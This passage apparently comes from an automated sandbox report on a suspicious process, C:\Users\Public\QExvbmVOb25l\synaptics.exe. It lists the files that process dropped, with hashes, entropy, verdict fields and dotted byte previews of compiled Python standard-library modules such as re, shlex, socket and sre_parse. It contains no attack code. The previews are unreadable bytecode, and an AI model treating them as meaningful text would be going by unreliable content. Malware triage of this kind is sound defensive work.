                                                                                                                                                                                      Preview:o........'-ds?.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.W.n...e.y#......d.Z.Y.n.w.g.d...Z.d.Z.G.d.d...d.e.j...Z.e.....e.j.....e.j.Z.d0d.d...Z.d0d.d...Z.d0d.d...Z.d1d.d...Z.d1d.d...Z.d1d.d...Z.d0d.d...Z.d0d.d...Z.d0d.d...Z.d.d...Z.d0d.d...Z.d.d...d.D...Z.d d!..Z.e.e...d"d.....Z.e.e...d"d.....d"....Z.i.Z.d#Z d$d%..Z!e.."e ..d&d'....Z#d(d)..Z$d*d+..Z%d.d.l&Z&d,d-..Z'e&.(e.e'e!....G.d.d/..d/..Z)d.S.)2a....Support for regular expressions (RE)...This module provides regular expression matching operations similar to.those found in Perl. It supports both 8-bit and Unicode strings; both.the pattern and the strings being processed can contain null bytes and.characters outside the US ASCII range...Regular expressions can contain both special and ordinary characters..Most ordinary characters, like "A", "a", or "0", are the simplest.regular expressions; they simply match themselves. You can.concatenate ordinary characters, so last matches the string 'last'...Th
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5263
                                                                                                                                                                                      Entropy (8bit):5.030955164289262
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:rdnTWdW9lUgN2VsfA2IywpvIyey0GtJAYKgl0Af6:dzDk52elT0c6Cg
                                                                                                                                                                                      MD5:2486C7811641EC4E949ABD6D9D61FD92
                                                                                                                                                                                      SHA1:963BC9E28601A76362A07860F82ABDCC8732EED8
                                                                                                                                                                                      SHA-256:815181D3EED57DA097A1FD7F3F0D16EFF89D49DCD131162E8A0B966323433EB8
                                                                                                                                                                                      SHA-512:BC00A6B366F18CEFF4C92BA6B6757C6DFE667AFB37B1C1AE54A8215EA94F9EFA023625B99D6D5D5A8DFB3AEA6681F0B42EFC13C6710BAB901CFFE4E49AB58C6A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d4........................@...s\...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.d...Z.G.d.d...d...Z.d.d...Z.e...Z.e.j.Z.d.S.).zGRedo the builtin repr() (representation) but with limits on most sizes.)...Repr..repr..recursive_repr.....N)...islice)...get_ident.....c........................s......f.d.d...}.|.S.).zGDecorator to make a repr function return fillvalue for a recursive callc........................sX...t...........f.d.d...}.t...d...|._.t...d...|._.t...d...|._.t...d...|._.t...d.i...|._.|.S.).Nc........................sJ...t.|...t...f.}.|...v.r...S.....|.....z...|...}.W.....|.....|.S.....|.....w...N)...idr......add..discard)...self..key..result)...fillvalue..repr_running..user_function...+C:\Users\Public\QExvbmVOb25l\lib\reprlib.py..wrapper....s......................z<recursive_repr.<locals>.decorating_function.<locals>.wrapper..__module__..__doc__..__name__..__qualname__..__annotations__)...set..getattrr....r....r....r....r....).r....r......r....).r....r....r......
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):17118
                                                                                                                                                                                      Entropy (8bit):5.1815230849873295
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:6jJ7Dm/9rSzUEok/L1xzQ8DdIE67SQSUQGJbvRkE4wSvBeL:6jJ7Dm/9rSzzBdIn7SQSkbvRkE4FvBeL
                                                                                                                                                                                      MD5:A5E8CDC77D5AD61A03A8C629C4E54EAC
                                                                                                                                                                                      SHA1:4FB8567DF71382A487FB231068004A752D5EEFFB
                                                                                                                                                                                      SHA-256:D1D78CC49B099ABA607A4588332842AD68A89DB313CAE0BEB81319886B9BD58A
                                                                                                                                                                                      SHA-512:7B5F6544E8A49295B3A1141B12D3C2ABAB64CC3FE22CB8322102E80F3D798FC501844D4A9F420F439103BB70F7F5A55CBA26D29E9FCEB879FA6A21F99ECECB28
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.N.......................@...s....d.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.d...Z.e.d.g.d.....Z.d.e._.e.j.d.k.rId.e.j._.d.e.j._.d.e.j._.d.e.j._.G.d.d...d.e...Z.G.d.d...d.e.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.e.d...r.G.d.d...d.e...Z.e.e.d ..r.G.d!d"..d"e...Z.e.e.d#..r.G.d$d%..d%e...Z.e.e.d&..r.G.d'd(..d(e...Z.d)d*..Z.e.d&..r.e.Z.d.S.e.d ..r.e.Z.d.S.e.d#..r.e.Z.d.S.e.d...r.e.Z.d.S.e.Z.d.S.)+z|Selectors module...This module allows high-level and efficient I/O multiplexing, built upon the.`select` module primitives.......)...ABCMeta..abstractmethod)...namedtuple)...MappingN..........c....................C...s`...t.|.t...r.|.}.n.z.t.|.......}.W.n...t.t.t.f.y"......t.d...|.....d...w.|.d.k.r.t.d...|.......|.S.).z.Return a file descriptor from a file object... Parameters:. fileobj -- file object or file descriptor.. Returns:. corresponding file descriptor.. Raises:. ValueError if the object is invalid. z.I
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7795
                                                                                                                                                                                      Entropy (8bit):5.512172106446463
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:dQrdt23n7mQxhSaL09FKXY5nzg9gn1yiEWE5cnPrrvX:KrsKb9FKo5zg9g1yLZ6Pf
                                                                                                                                                                                      MD5:ED168D357C03DC26539D6D968359834C
                                                                                                                                                                                      SHA1:2772B6B1F3DBBE21F41BE36C5FD6AF8A14251C3F
                                                                                                                                                                                      SHA-256:616593ABCAA088F46D0322565739FB6A55466F540C99C2B740AFA0A1D5DA73B8
                                                                                                                                                                                      SHA-512:8EB969239BEC3D7A1C30F3CD30D68249B59680A24F091E605D7A5933BFB5D9302BFB0D5315DFE3F8A5D95416C7A28D2E5AAD3FFDF35E13F1213CDBD0E2D25449
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.6.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.d.d.d...Z.d.d...Z.e...d.e.j...j.Z.d.d...Z.d.d...Z.e.d.k.rse.e.j...d.k.rPe.e.......d.S.e.j.d...Z.e.e.....Z.e.e.e.e.......W.d.........d.S.1.slw.......Y...d.S.d.S.)..8A lexical analyzer class for simple shell-like syntaxes......N)...deque)...StringIO)...shlex..split..quote..joinc....................@...sv...e.Z.d.Z.d.Z.....d.d.d...Z.e.d.d.....Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.S.).r....r....NFc....................C...s....t.|.t...r.t.|...}.|.d.u.r.|.|._.|.|._.n.t.j.|._.d.|._.|.|._.|.r$d.|._.n.d.|._.d.|._.d.|._.|.j.r7|...j.d.7..._.d.|._.d.|._.d.|._.d.|._.d.|._.d.|._.t...|._.d.|._.d.|._.d.|._.t...|._.d.|._.|.sbd.}.n.|.d.u.rhd.}.|.|._.|.r.t...|._.|...j.d.7..._.|.j...t...|.....}.|.j...|...|._.d.S.d.S.).N....#Z?abcdfeghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_u|..............................
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):38374
                                                                                                                                                                                      Entropy (8bit):5.531484846325215
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:C6QqETanIk41k7RiruyBW6rZiFuTPgtyQwye+idEd4jalseGehtq:C6QqEMIBddYATPgtyQwye+idEd4useGr
                                                                                                                                                                                      MD5:4EF34DB92E7BCC69DA9DD074935EC471
                                                                                                                                                                                      SHA1:608A4B93D92FABB2D0E7C1B79273B8D25E2E5C09
                                                                                                                                                                                      SHA-256:1D9F08B34BE1772C42A62E37A245E3C0B254D33B74E17BCEE6A01AD6394551F7
                                                                                                                                                                                      SHA-512:A919661B2FD8C86F31612DADDF37259D419F85E3AE70A287ED35BF38E01413A9D18576661B9981BC678AA6081D0E98E47E12AE04D10C317BC51DC568E4753136
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s"...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.[.d.Z.W.n...e.y.......d.Z.Y.n.w.z.d.d.l.Z.[.d.Z.W.n...e.yC......d.Z.Y.n.w.z.d.d.l.Z.[.d.Z.W.n...e.yX......d.Z.Y.n.w.e.j.d.k.Z.d...Z.Z.e.j.d.k.rld.d.l.Z.n.e.rrd.d.l.Z.e.rvd.n.d.Z.e.e.d...o.e.j...d...a.e.o.e.e.d...Z.d.Z.g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e ..Z!G.d.d...d.e ..Z"d.d...Z#d.d...Z$e.f.d d!..Z%d.d"d#..Z&d$d%..Z'd&d'..Z(d(d)..Z)d.d*..d+d,..Z*d.d*..d-d...Z+e.e.d/....r.d.d*..d0d1..Z,n.d2d1..Z,d.d*..d3d4..Z-d.d*..d5d6..Z.d.d*..d7d8..Z/d9d:..Z0..d.d;d<..Z1d.d.e/d.d.f.d=d>..Z2e.e.j3d?....r@d@dA..Z4dBdC..Z5n.dDdA..Z4dEdC..Z5dFdG..Z6dHdI..Z7e.j8e.j.e.j9e.j:h.e.j;k...oje.j<e.j=v...oje.j.e.j>v.Z?d.dJdK..Z@e?e@_AdLdM..ZBe/f.dNdO..ZCdPdQ..ZDdRdS..ZEdTdU..ZFdVdW..ZG....d.dYdZ..ZH....d.d[d\..ZId]eHd^g.d_d.f.i.ZJe...r.eHd`g.dad.f.eJdb<.eIg.dcd.f.eJdd<.e...r.eHdeg.dfd.f.eJdg<.e...r.eHdhg.did.f.eJdj<.dkdl..ZKd.dndo..ZLdpdq..ZM
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2948
                                                                                                                                                                                      Entropy (8bit):4.8796788109167695
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:/ynPssxfA01vMnGjQQDGnvsSZdCztcKcynJyDywm18XQfkt+A7BN5XjyubuOAh:sUshAku4rGvsqG6PiJyDywmcQq+A7D5a
                                                                                                                                                                                      MD5:9913A4073B84AB819D9980F5EE50879B
                                                                                                                                                                                      SHA1:2ABE2F5F6B4EC691672976F39A34BC09F232AE67
                                                                                                                                                                                      SHA-256:10679BF423679AB3FD4025D6B248EF3D49A2F46A692AD41CC99DB4217E857DEB
                                                                                                                                                                                      SHA-512:493006FCD7C0909FB478E281E9E5E00B5B437C894E84F4322F6F625B31E82EAD0CB1228F6B3D04D9307798A2D2734CCB11B4307A3B0B65146FC59B59A4D8CBDA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.d.l.Z.d.d.l.T.d.d.l.m.Z...e...Z.e...d.e.d.d.......e...d.e.d.d.......d.e.v.r0e...d.e.d.d.......d.d...Z.d.d...Z.d.d...Z.e.e.j...d.d.....Z.e.e.j...d.d.....Z.d.e.v.r[e.e.j...d.d.....Z.d.e.v.rhe.e.j...d.d.....Z.d.e.v.rue.e.j...d.d.....Z.d.e.v.r.e.e.j...d.d.....Z.[.[.d.S.)......N)...*)...IntEnum..Signalsc....................C...s(...|.....r.|...d...o.|...d.....p.|...d...S.).NZ.SIGZ.SIG_Z.CTRL_)...isupper..startswith....name..r.....*C:\Users\Public\QExvbmVOb25l\lib\signal.py..<lambda>....s............r......Handlersc....................C........|.d.v.S.).N)...SIG_DFL..SIG_IGNr....r....r....r....r....r.................pthread_sigmaskZ.Sigmasksc....................C...r....).N).Z.SIG_BLOCKZ.SIG_UNBLOCKZ.SIG_SETMASKr....r....r....r....r....r........r....c....................C...s"...z.|.|...W.S...t.y.......|...Y.S.w.).zsConvert a numeric value to an IntEnum member.. If it's not a known member, return the numeric value itself.. )...ValueError)
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):17393
                                                                                                                                                                                      Entropy (8bit):5.5105957286201
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:0lpvTn42l1QP47TUN1PirJtKA5y15/Jgt1nmKQ1ruVhY2lrD9bIhx/xAUu2n8/X1:yL42lug7TA1Pi9cA015hgt1nmlUvvlrx
                                                                                                                                                                                      MD5:451848F5112EEB17E11A3A9F9CB083D0
                                                                                                                                                                                      SHA1:C59424A76DA1BBAAB1DD2537126FF2AAFFCDE86A
                                                                                                                                                                                      SHA-256:896DC4932ADB45D2996028A2E12E342551CE61F7D47222355B592276ED8CD289
                                                                                                                                                                                      SHA-512:2B1B95F13F3B7D100043E2C2D810FFAB3A5DC43B2C29CD1C934C9959F129F22C83EA4FABC31E50EE512E2C2C111361484A6C739BDC9A9502C696389AB126280F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.Z.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.e.j.g.a.d.a.d.a.d.a.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d4d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d4d.d...Z.d4d.d ..Z.d!d"..Z.d#d$..Z.d%d&..Z.d'd(..Z.d)d*..Z.d+d,..Z d-d...Z!d/d0..Z"e.j#j$s.e"....d1d2..Z%e&d3k.r.e%....d.S.d.S.)5a....Append module search paths for third-party packages to sys.path...****************************************************************.* This module is automatically imported during initialization. *.****************************************************************..This will append site-specific paths to the module search path. On.Unix (including Mac OSX), it starts with sys.prefix and.sys.exec_prefix (if different) and appends.lib/python<version>/site-packages..On other platforms (such as Windows), it tries each of the.prefixes directly, as well as with lib/site-packages appended. The.resulting directories, if they exist, are appended to
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):28976
                                                                                                                                                                                      Entropy (8bit):5.535157918339055
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:Ptwxm9l/P/XkfPdJRP8IqEhlM+5lEwQ04PmNn9N:POxWpQ+I3hlNlEwQ0uc9N
                                                                                                                                                                                      MD5:86A1D7224A6C9F29C3AB6425C6DA4EC4
                                                                                                                                                                                      SHA1:7B7BF0578B4FF2D0806B5BAF6D71806733574D78
                                                                                                                                                                                      SHA-256:45E2F11BC9D5F24C7EFD4B95275F7D0049F67E8AF716EFF83ECDC2593164D56A
                                                                                                                                                                                      SHA-512:D82CA4A1CF840085C389ACB9D772B6DB324812302696AF7111A88F79CB0D199897BE0448268004748C355925A8F7A1A3249D1B74097FAA9AE2239C797D158147
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dq........................@...sT...d.Z.d.d.l.Z.d.d.l.T.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...z.d.d.l.Z.W.n...e.y3......d.Z.Y.n.w.e.e.d.d...Z.e.e.d.d...Z.e.e.d.d...Z.g.d...Z.e...e...e.......e...d.e.d.d.......e...d.e.d.d.......e...d.e.d.d.......e...d.e.d.d.......d.Z.d.Z.d.d...Z.e.j.......d.....r.i.Z.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d <.d!e.d"<.d#e.d$<.d%e.d&<.d'e.d(<.d)e.d*<.d+e.d,<.d-e.d.<.d/e.d0<.d1e.d2<.d3e.d4<.d5e.d6<.d7e.d8<.d9e.d:<.d;e.d<<.d=e.d><.d?e.d@<.dAe.dB<.dCe.dD<.dEe.dF<.dGe.dH<.dIe.dJ<.dKe.dL<.dMe.dN<.dOe.dP<.dQe.dR<.dSe.dT<.dUe.dV<.dWe.dX<.dYe.dZ<.d[e.d\<.d]e.d^<.d_e.d`<.dae.db<.dce.dd<.dee.df<.dge.dh<.die.dj<.dke.dl<.dme.dn<.doe.dp<.dqe.dr<.dse.dt<.due.dv<.dwe.dx<.dye.dz<.d{e.d|<.d}e.d~<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15207
                                                                                                                                                                                      Entropy (8bit):5.610123589853115
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:MAz34fmVm0PVclj2zdkfUQPM2uwNX+0b5+Qwo39l5JCusKeMjv:MAnV8j8K8QL995twoNnJuKeov
                                                                                                                                                                                      MD5:40D5F2F13E426D6DA926F5D9D7F1EF8B
                                                                                                                                                                                      SHA1:1DF31256F6E5EB08EAEF48531A23B268A165808F
                                                                                                                                                                                      SHA-256:A227116BAC972F5A76642BEBEB1B79DD95B0A2F44991486DC275485F33DB5D48
                                                                                                                                                                                      SHA-512:09AC1A9B952EB1B093AE2F0D2E091E66C1EBAF248F55FD7C5A4B8F1BC3A9FD52291CA368D03E3BEF6884184C3114A623868EA59ED7430B452E5676156DD46176
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dmp.......................@...s$...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.e.j.e.k.s.J.d.....e.e.h.Z.e.e.e.h.Z.e.e.h.Z.e.e.h.Z.e.e.e.h.B.Z.d.Z.d.d...e.D...Z.e.j.f.d.d...Z.d.d...Z.d.d...Z.d-d.d...Z.e.j.d...Z.d.e.>.d...Z.d.Z.e.e f.d.d...Z!d.d...Z"d.d...Z#d.d...Z$d.d...Z%d.d...Z&d.d ..Z'd!d"..Z(d#d$..Z)d%d&..Z*d'd(..Z+d)d*..Z,d.d+d,..Z-d.S.)/z.Internal support module for sre.....N)...*z.SRE module mismatch).)..i...i1...)..s...i....).....i....).iE...i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i2...i....).i4...i....).i>...i....).iA...i....).iB...i....i....).iJ...i....).ic...i....).i....iK...).ia...i....).i....i....c........................s....i.|.].}.|.D.].....t...f.d.d...|.D.......q.q.S.).c....................3...s......|.].}...|.k.r.|.V...q.d.S...N..)....0..j....ir...../C:\Users\Public\QExvbmVOb25l\lib\sre_compile.py..<genexpr>N...s........z.<dictcomp>.<genexpr>)...tuple).r......tr....r....r......<dic
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6370
                                                                                                                                                                                      Entropy (8bit):5.779185419953205
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:u7jrG4iQ2AaI2Ym9hqQBI1I1dadE1ff7l17mwvYhaSEZ84C:uM9EIdNfT6E8
                                                                                                                                                                                      MD5:78312A280255BA09D4428C791B398342
                                                                                                                                                                                      SHA1:D3DD822786D223D40EA8F31D08D8499049D2EA3E
                                                                                                                                                                                      SHA-256:1156A1255C0142ECC51BDC390F54B68AA5C2CB123B66456403A36B9B85214463
                                                                                                                                                                                      SHA-512:D1535C8B782729F05E95748A2703BFC3FA4C2216A6FD7D1224F5E4D00B02153AACC9895DB0EE2F51FC70DA2623335EF46DB4D718AA45F15FCB293ABC4D66DA75
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s^...d.Z.d.Z.d.d.l.m.Z.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.e.e.d...Z.d.d...Z.e.d...Z.e.d.d...=.e.d...Z.e.d...Z.e.e.e.e.i.Z.e.e.e.e.i.Z.e.e.e.e.i.Z.e.e.e.e.i.Z.e.e.e.e i.Z!e.e"e.e#i.Z$e%e%e&e&e'e'e(e(e)e*e+e,e-e-e.e.i.Z/e%e0e&e1e'e2e(e3e)e4e+e5e-e6e.e7i.Z8d.Z9d.Z:d.Z;d.Z<d.Z=d.Z>d.Z?d.Z@d.ZAd.ZBd.ZCd.ZDeEd.k...r-d.d...ZFeGd.d....zZHeH.Id.....eH.Id.e.......eFeHe.d ....eFeHe.d!....eFeHe.d!....eH.Id"e9......eH.Id#e:......eH.Id$e;......eH.Id%e<......eH.Id&e=......eH.Id'e>......eH.Id(e?......eH.Id)e@......eH.Id*eA......eH.Id+eB......eH.Id,eC......eH.Id-eD......W.d.........n.1...s"w.......Y...eJd.....d.S.d.S.)/z.Internal support module for srei..3......)...MAXREPEAT..MAXGROUPSc........................s&...e.Z.d.Z.d.Z.d.Z.d...f.d.d...Z.....Z.S.)...errorai...Exception raised for invalid regular expressions... Attributes:.. msg: The unformatted error message. pattern: The regular expression pattern. pos: The index in the pattern
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):21768
                                                                                                                                                                                      Entropy (8bit):5.596073941861055
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:CiS5DWum7nnQBcNr5ZjTL2xsP6HeYHfS/l2b7tAu9o23kZAt2umjtU30TezUpPB9:Cig5K2I6+YKd2b7tX3AAt2usyUx0lI
                                                                                                                                                                                      MD5:6B604600B56CF13B86DA5505341277B1
                                                                                                                                                                                      SHA1:C62376E01A9FAED9FD1B7E3F6EC2E323D80E28E3
                                                                                                                                                                                      SHA-256:37A78AF691D8E85E6F2527ECA515E1D3EFCA58CE53A1A117D576A52206E7F364
                                                                                                                                                                                      SHA-512:D57FAA4A41D4B8D2AB16369B0984D0964C860E1C603DC6748903B394D7921C9AA9606183FF311932174926474952F7F4CA09157A1B299475E0BA645098C258D7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.d.d.l.T.d.Z.d.Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.e.e.h...Z.e.e.e.e.e.e.e.h...Z.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.d...Z.e.e.f.e.e.f.e.e.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e f.d...Z!e"e#e$e%e&e'e(e)d...Z*e'e#B.e)B.Z+e,e(B.Z-G.d.d...d.e...Z/G.d.d...d...Z0G.d.d...d...Z1G.d.d...d...Z2d.d...Z3d.d ..Z4d!d"..Z5d#d$..Z6d3d&d'..Z7d(d)..Z8d*d+..Z9d4d-d...Z:d/d0..Z;d1d2..Z<d,S.)5z.Internal support module for sre.....)...*z..\[{()*+?^$|z.*+?{Z.0123456789Z.01234567Z.0123456789abcdefABCDEFZ4abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZz. ............................\).z.\a..\bz.\fz.\nz.\rz.\tz.\vz.\\).z.\Ar....z.\Bz.\dz.\Dz.\sz.\Sz.\wz.\Wz.\Z)...i..L..m..s..x..a..t..uc....................@...s....e.Z.d.Z.d.S.)...VerboseN)...__name__..__module__..__qualname__..r....r.....-C:\Users\Public\QExvbmVOb25l\lib\sre_parse.pyr....G...s........r....c...........
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):44833
                                                                                                                                                                                      Entropy (8bit):5.571074045540938
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:M653tgqDiJVJd4LRmQPAMN4FM81OVgTkC5Nq9F6:M63tBOJDy9T9NCUM1rqb6
                                                                                                                                                                                      MD5:D05F52515B2F1391DCB71F4C22AD68D4
                                                                                                                                                                                      SHA1:AA8C2522946E26890CE4B1CFEA48D13F842ED7F4
                                                                                                                                                                                      SHA-256:A05BAE9A574CC922E8B25154D4BD1EADCFFA8E40DFADC5A59499410ADFD1306A
                                                                                                                                                                                      SHA-512:F60036C984CF723ED73CD0A4DA5F805FA1205DA5D93A931ED35A35154F71A0F4087F0A09F48048C79BF7F8BA3748EAEBAAADEA44DD255A7799F6896DB3469E6E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m Z m!Z!..z.d.d.l.m"Z"..W.n...e#yi......Y.n.w.d.d.l.m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*m+Z+m,Z,m-Z-..d.d.l.m.Z.m/Z/..e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e2j3..Z4e2_4d.d...e2j5.6..D...Z7e8e2d.d...Z9G.d.d...d.e...Z:G.d d!..d!e...Z;G.d"d#..d#e...Z<G.d$d%..d%e...Z=e.j>d&k...r.d.d'l.m?Z?m@Z@..d.d(lAmAZAmBZBmCZC..d.d)lAmDZDmEZEmFZF..d.d.lAZGd.d.lHZHd.d.lIZId.d.lJZJeKZLd*g.ZMeNe.d+..ZOe.ZPe.ZQd,d-..ZRd.d/..ZSd0d1..ZTd2d3..ZUe.d4d5..ZVd6d7..ZWG.d8d9..d9e.d9d:....ZXG.d;d<..d<eXe...ZYG.d=d>..d>e...ZZeYj[f.d.d.d.d?..d@dA..Z\d[e]dBeYj[d.d.d.d.d.dC..dDdE..Z^e\Z_e^Z`G.dFdG..dG..ZadHdI..ZbG.dJdK..dKeA..ZceceZ_deaeZ_ed.d.dBe]e3d.dLdLd.f.dMdN..ZfdOdP..ZgdQZhdRZidSdT..ZjdUdV..Zkeld.eFf.dWdX..ZmdYdZ..Znd.S.)\
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4286
                                                                                                                                                                                      Entropy (8bit):5.544036225923017
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Vn/f+60wN3EXHH/aowjk0wBoCAEFXOrW6QBeABPl:VeRy3EPBwjk0w+CFXefQBT
                                                                                                                                                                                      MD5:AD84ADD95AEDFB9736A49973BBED0D16
                                                                                                                                                                                      SHA1:9CC56FDF932968B3A54147DF256E98D9CB167E74
                                                                                                                                                                                      SHA-256:9AC87000ADB670791EA7F9E96D88CA836B835F3380567853BC9621972D8DB28A
                                                                                                                                                                                      SHA-512:DB9448B413D27D79E96FB666A22594BF2DD353356B3AFB38B2244E3B529A5B1A29FE88F2B2D208CDBEDCA3F95D76F887B7EF3A52D07CDAF6A6ED4FF340520D8E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
